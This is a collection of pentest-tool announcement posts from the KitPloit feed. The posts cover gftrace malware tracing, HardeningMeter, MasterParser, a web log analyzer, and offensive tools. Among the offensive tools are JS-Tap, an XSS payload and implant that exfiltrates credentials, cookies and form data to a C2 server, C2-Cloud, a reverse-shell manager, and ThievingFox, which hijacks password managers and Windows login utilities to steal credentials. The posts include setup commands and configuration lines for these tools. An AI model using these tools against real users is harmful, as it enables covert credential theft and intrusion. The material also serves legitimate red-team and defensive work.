    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
    - WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
    - WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
    - WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
    - WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
    - WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

    [...]

    Tracing multiple functions in the DeimosC2 framework agent:

    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
    - setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
    - socket(0x2, 0x1, 0x6) = 0x138 (312)
    - WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
    - GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
    - GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
    - LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
    - NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
    - GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
    - GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
    - CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
    - GetCurrentProcessId() = 0x2584 (9604)
    - GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )

    [...]

    Future features:

    • [x] Support inspection of 32 bits files.
    • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
    • [x] Add support to cmdline parameters for the target process
    • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

    :warning: Warning

    • The tool inspects the target binary dynamically and it means the file being traced is executed. If you're inspecting a malware or an unknown software please make sure you do it in a controlled environment.
    • Golang programs can be very noisy depending the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise but after that it's up to the user to decide what functions are better to filter in each scenario.

    License

    The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R β€” May 5th 2024 at 12:30


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


    Execute Scanning Example

    Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan, the argument can get more than one file seperated by spaces.

    -d --directory

    Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format'

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

    By: Zion3R β€” May 4th 2024 at 12:30


    JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


    Changelogs

    Major changes are documented in the project Announcements:
    https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

    Demo

    You can read the original blog post about JS-Tap here:
    javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

    Short demo from ShmooCon of JS-Tap version 1:
    https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

    Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
    https://youtu.be/aWvNLJnqObQ?t=11719

    A demo can also be seen in this webinar:
    https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

    Upgrade warning

    I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

    Introduction

    JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

    The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

    Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

    The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

    Make sure you review the configuration section below carefully before using on a publicly exposed server.

    Data Collected

    • Client IP address, OS, Browser
    • User inputs (credentials, etc.)
    • URLs visited
    • Cookies (that don't have httponly flag set)
    • Local Storage
    • Session Storage
    • HTML code of pages visited (if feature enabled)
    • Screenshots of pages visited
    • Copy of Form Submissions
    • Copy of XHR API calls (if monkeypatch feature enabled)
      • Endpoint
      • Method (GET, POST, etc.)
      • Headers set
      • Request body and response body
    • Copy of Fetch API calls (if monkeypatch feature enabled)
      • Endpoint
      • Method (GET, POST, etc.)
      • Headers set
      • Request body and response body

    Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

    Operating Modes

    The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

    Trap Mode

    Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

    Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

    In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

    Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

    Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

    A user refreshing the page will generally break/escape the iframe trap.

    Implant Mode

    Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

    A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

    Installation and Start

    Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

    Example:

    mkdir jsTapEnvironment
    python3 -m venv jsTapEnvironment
    source jsTapEnvironment/bin/activate
    cd jsTapEnvironment
    git clone https://github.com/hoodoer/JS-Tap
    cd JS-Tap
    pip3 install -r requirements.txt

    run in debug/single thread mode:
    python3 jsTapServer.py

    run with gunicorn multithreaded (production use):
    ./jstapRun.sh

    A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

    If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

    Note that on Mac I also had to install libmagic outside of python.

    brew install libmagic

    Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

    Configuration

    JS-Tap Server Configuration

    Debug/Single thread config

    If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

    Proxy Mode

    For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

    If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

    When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

    Data Directory

    The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

    Server Port

    To change the server port configuration see the last line of jsTapServer.py

    app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

    Gunicorn Production Configuration

    Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

    A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

    At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

    Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

    Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

    telemlib.js Configuration

    These configuration variables are in the initGlobals() function.

    JS-Tap Server Location

    You need to configure the payload with the URL of the JS-Tap server it will connect back to.

    window.taperexfilServer = "https://127.0.0.1:8444";

    Mode

    Set to either trap or implant This is set with the variable:

    window.taperMode = "trap";
    or
    window.taperMode = "implant";

    Trap Mode Starting Page

    Only needed for trap mode. See explanation in Operating Modes section above.
    Sets the page the user starts on when the iFrame trap is set.

    window.taperstartingPage = "http://targetapp.com/somestartpage";

    If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

    window.taperstartingPage = window.location.href;

    Client Tag

    Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

    This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

    window.taperTag = 'whatever';

    Custom Payload Tasks

    Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

    window.taperTaskCheck        = true;
    window.taperTaskCheckDelay = 5000;
    window.taperTaskJitterBottom = -2000;
    window.taperTaskJitterTop = 2000;

    Exfiltrate HTML

    true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

    window.taperexfilHTML = true;

    Copy Form Submissions

    true/false setting on whether to intercept a copy of all form posts.

    window.taperexfilFormSubmissions = true;

    MonkeyPatch APIs

    Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

    window.monkeyPatchAPIs = true;

    Screenshot after API calls

    By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

    window.postApiCallScreenshot = true;
    window.screenshotDelay = 1000;

    JS-Tap Portal

    Login with the admin credentials provided by the server script on startup.

    Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

    The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

    Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

    When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

    Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

    The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

    Custom Payloads

    Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

    [{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

    The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

    In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

    You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

    The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

    To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

    Tools

    A few tools are included in the tools subdirectory.

    clientSimulator.py

    A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

    At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.

    numClients = 50

    You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

    apiServer = "https://127.0.0.1:8444"

    JS-Tap run using gunicorn scales quite well.

    MonkeyPatchApp

    A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.

    Run with:

    python3 monkeyPatchLab.py

    By default this will start the application running on:

    https://127.0.0.1:8443

    Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

    function injectPayload()
    {
    document.head.appendChild(Object.assign(document.createElement('script'),
    {src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
    }

    formParser.py

    Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.

    You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

    generateIntelReport.py

    No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.

    Contact

    @hoodoer
    hoodoer@bitwisemunitions.dev



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

    By: Zion3R β€” May 3rd 2024 at 12:30


    What is MasterParser ?

    MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.


    MasterParser Wallpapers

    Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

    Supported Logs Format

    This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

    Feature & Log Format Requests:

    If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

    How To Use ?

    How To Use - Text Guide

    1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
    2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
    3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
    # How to navigate to "MasterParser-main" folder from the PS terminal
    PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
    1. Now you can execute the tool, for example see the tool command menu, do this:
    # How to show MasterParser menu
    PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
    1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
    # How to run MasterParser
    PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
    1. That's it, enjoy the tool!

    How To Use - Video Guide

    https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

    MasterParser Social Media Publications

    Social Media Posts
    1. First Tool Post
    2. First Tool Story Publication By Help Net Security
    3. Second Tool Story Publication By Forensic Focus
    4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R β€” May 2nd 2024 at 12:30


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

    πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
    πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
    πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
    πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
    πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

    Architecture

    Application setup

    • Management port: 9000
    • Reversse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

    • Optional: Update chait_id, bot_token in c2-telegram/config.yml
    • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

    By: Zion3R β€” May 1st 2024 at 12:30


    Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


    Features

    1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

    2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

    3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

    4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

    Future Features

    This project is actively developed, and future features may include:

    1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
    2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

    Installation

    The tool only requires Python 3 at the moment.

    1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
    2. step2: cd OSTE-Web-Log-Analyzer
    3. step3: python3 WLA-cli.py

    Usage

    After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

    use -h or --help for more detailed usage examples : python3 WLA-cli.py -h

    Contact

    linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R β€” April 30th 2024 at 12:30


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using :

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

    After adding Mono repositories, Nuget can be installed using apt :

    apt install nuget

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

    Targets

    All modules have been tested on the following Windows versions :

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

    [!CAUTION] Modules have not been tested on other version, and are expected to not work.

    Application Injection Method
    KeePass.exe AppDomainManager Injection
    KeePassXC.exe DLL Proxying
    LogonUI.exe (Windows Login Screen) COM Hijacking
    consent.exe (Windows UAC Popup) COM Hijacking
    mstsc.exe (Windows default RDP client) COM Hijacking
    RDCMan.exe (Sysinternals' RDP client) COM Hijacking
    MobaXTerm.exe (3rd party RDP client) COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --ke epassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
